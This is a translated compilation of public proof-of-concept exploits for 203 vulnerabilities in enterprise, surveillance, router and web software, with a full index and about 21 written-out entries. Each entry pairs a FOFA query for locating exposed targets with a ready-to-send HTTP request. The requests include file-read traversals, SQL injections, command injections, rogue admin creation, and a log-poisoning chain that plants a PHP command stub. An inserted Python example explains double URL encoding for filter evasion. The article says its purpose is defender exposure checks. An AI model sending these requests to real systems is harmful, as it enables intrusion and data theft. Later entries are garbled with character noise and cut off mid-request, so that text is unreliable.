Public Internet Vulnerability Compilation, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks. This article is meant to help defenders; blue teams can use its contents to check their own exposure.

Sources: the article covers 203 PoCs for high-impact vulnerabilities published in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: every vulnerability listed here is already public. For patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few PoCs that are too long are replaced with the placeholder PAYLOAD; search for the full PoC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the complete list; when using it, search the page for the keyword you need.

Bookmark this article if it is useful to you. You can also follow the public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo API SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php API arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
138. Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
139. Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
140. Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
141. Kirisun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass via template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle GPS monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload API file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of the password you want for the new account.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin panel with the default account admin, then send the following request. The command is injected through the wifiRebootrange field (12:00; id;); the stok in the URL and the sysauth cookie are both session values taken from that login. The %s values are unfilled placeholders left in the PoC as published.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained when logging in during step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The keyword value after the leading 1 is the double URL encoding of the following statement (every character percent-encoded, then the result percent-encoded again, which is why a quote appears as %25%32%37):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

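The encoding step above is easy to get wrong with a standard library quoting function, and the same mechanism is what lets the payload slip past a filter that decodes only once. The following is an added example, not code from the original article or from Doccms: it reproduces the keyword value from the request above (copied in as PAGE_KEYWORD) from the page's statement and shows what a single-decode filter would see. The helper names are this example's own.

```python
# Added example: reproduce and undo the double URL encoding used in the
# Doccms keyword PoC above. Not code from the original article or from Doccms.
from urllib.parse import unquote

# The SQL statement the page gives for this PoC.
STATEMENT = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"

# The keyword value copied from the request above; the leading "1" is sent as-is.
PAGE_KEYWORD = (
    "1"
    "%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30"
    "%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31"
    "%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35"
    "%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66"
    "%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30"
    "%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33"
    "%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30"
    "%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39"
    "%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35"
    "%25%32%39%25%32%39%25%32%39%25%32%33"
)


def percent_encode_all(s: str) -> str:
    """Percent-encode every byte, letters and digits included, with lowercase hex.

    urllib.parse.quote() leaves alphanumerics alone, so it cannot produce the
    %36%31 (for 'a') groups seen in the PoC; a byte-wise encoder can.
    """
    return "".join(f"%{b:02x}" for b in s.encode("utf-8"))


def double_url_encode(s: str) -> str:
    """Encode twice. The second pass turns each '%' into %25 and each hex digit
    into %3x / %6x, which is where the %25%32%37 pattern for a quote comes from."""
    return percent_encode_all(percent_encode_all(s))


def decode_once(value: str) -> str:
    """What a filter or log parser that decodes a single layer would inspect:
    '1%27%20%61...' contains no quote, so a naive SQLi check passes it."""
    return unquote(value)


def decode_fully(value: str, max_rounds: int = 5) -> str:
    """Peel percent-encoding until the value stops changing (bounded so that
    hostile input cannot loop forever). This is the normalisation a WAF needs
    before pattern matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


if __name__ == "__main__":
    print("page keyword reproduced:", "1" + double_url_encode(STATEMENT) == PAGE_KEYWORD)
    print("single decode sees     :", decode_once(PAGE_KEYWORD)[:40], "...")
    print("full decode sees       :", decode_fully(PAGE_KEYWORD))
```

The application decodes the query string once (the web server) and then a second time in its own code, so the statement only appears in clear after two rounds; any inspection that sits in front of the second round has to repeat the decode until the value is stable.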
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: fetch the login page to obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is reused (together with jorani_session) in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


Step 2: POST the login form. The language value is traversed to ../../application/logs and the login value carries a PHP stub that executes the base64-decoded value of the K1SYJPMHLU4Z request header, so the login attempt is written, PHP included, into the application log.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Step 3: read the current day's log file back through the pages/view route with the header set; the poisoned log is rendered as PHP and the id command runs. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of echo ---------;id 2>&1;echo ---------;
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords. The ;.ico path parameter bypasses the authentication filter.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords. This variant reaches the same endpoint through a dot-segment (a.ico/../getAllList) instead of a path parameter.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

3 {' B" k6 P7 j. p; R0 R16. 红帆HFOffice医微云SQL注入
, i: N) {3 V8 x W" SFOFA:title="HFOffice"
6 C) Y9 F7 |3 ~3 a% ^poc中调用函数计算1234的md5值; U* x6 z$ Q& D! }: P
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
) I* a0 J5 V5 F% L- `9 d9 wHost: x.x.x.x" M9 K9 T6 ^8 W
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 Y2 m9 D# G" z
Connection: close5 R, j8 B! d* E5 N8 J
Accept: */*
& G+ _! V4 D, g8 vAccept-Language: en& x* y9 H" s6 e/ W: L! E& u1 I
Accept-Encoding: gzip2 ^' q2 Z5 Y2 Q3 H
/ K, ~6 u8 g8 T9 F4 B/ Y% P% ?- p1 V
5 C4 c# N8 f8 [. q$ ?17. 大华 DSS itcBulletin SQL 注入6 f! Y. b: |. L8 f
FOFA:app="dahua-DSS"* S1 i& j7 o1 s8 I ]
POST /portal/services/itcBulletin?wsdl HTTP/1.1) K/ N& Y" {# v' a3 u
Host: x.x.x.x/ ~( O' |, s# [( h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) k( }- T& I% p, V0 N W, `, N- GConnection: close
2 V* O& ~( Y4 {. V* NContent-Length: 345
3 z7 V# |' e. V5 yAccept-Encoding: gzip) Y! u" _. Q4 Z! i4 S8 a& g& e1 s
$ G' J4 w# B2 }$ z+ z d
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
& v; `; J0 m/ [1 d- m<s11:Body>
}" H* |' M5 o9 T3 e5 s <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>& e* w ~7 d- K: W' C6 T, g
<netMarkings>1 @+ i1 p* A0 }( c5 _
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
: l: Q6 u$ [. w4 N* z- d0 N </netMarkings>
% Z6 _5 r$ G4 W L$ O& K0 B& ? </ns1:deleteBulletin>. g5 w" j2 Q! P9 b) K# T ]9 ?
</s11:Body>
! l- V& I0 q6 ]5 O6 d2 m! W5 `</s11:Envelope>) T# L3 U. s' b; m r! @; a
. d4 h- m7 F* l- m/ s; ^, N2 C3 r6 _( d0 Y" C$ k" a
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露- m8 V& k8 E6 C* V, V* L G
FOFA:app="dahua-DSS"
/ ^/ o' @5 P* G3 F, KGET /admin/cascade_/user_edit.action?id=1 HTTP/1.12 P3 G$ K. {# y3 I
Host: your-ip8 S8 B! {6 u8 l5 X; z8 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. R2 t! r9 n7 N# g$ l! {Accept-Encoding: gzip, deflate4 f: F9 @9 h7 _9 p7 B: ?
Accept: */*3 m! N. O. g) I& x
Connection: keep-alive
. W! J8 T3 l4 Z# J- Z: I2 g3 F7 a9 c( {
' F8 H' i* x9 Z8 A- ?' n2 W
. L" V1 R7 ~- r9 u9 R. a$ k! i9 _1 G3 g19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入* K6 K! O4 n& M5 Y/ M, d
FOFA:app="dahua-DSS"( w4 c* U6 q4 c1 O8 o7 E
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.15 A. D) e4 r3 l0 s, g0 i
Host:& v/ l- _' ]# A7 q. a
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 ?- [) L2 J0 q3 ?4 f0 n
Accept-Encoding: gzip, deflate# N$ E8 l2 J5 f ] ]" o/ O3 }
Accept: */*
3 r" M8 M9 @% u8 h) nConnection: keep-alive6 ` C- H1 |- _9 R: n2 {
4 Q; p5 h- M, h. t
7 V0 T4 ]2 X( w: n20. 大华ICC智能物联综合管理平台任意文件读取+ A4 T! P- S) N# j9 a' C' U7 d
FOFA:body="*客户端会小于800*"
& ~7 M) V2 T- rGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1! A. }7 r; m- n( K" s) G' z
Host: x.x.x.x
Q+ A8 A& [. m4 xUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; Q8 o# d+ c& w- E* oConnection: close
# G& p4 h3 f' V3 |/ Y( a6 @. oAccept: */*2 q4 [: G/ _; l) P% V7 ~
Accept-Language: en. M, y- v5 W1 G2 I. S
Accept-Encoding: gzip5 O2 X1 h r) W
7 c: l" R5 g) R9 W1 Q' O
1 B) N+ K/ D1 g1 B21. 大华ICC智能物联综合管理平台random远程代码执行
* t$ V, P: Q7 b" x6 K& EFOFA:icon_hash="-1935899595"' Z H1 u/ ?( z- _4 E2 D
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 ?. G2 w8 c3 a' p7 U& Q
Host: x.x.x.x
5 K! E/ m5 ]4 r7 N8 h) A/ Q- O- eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# O- F% U9 |- WContent-Length: 161& e& W3 M0 l# d+ K e
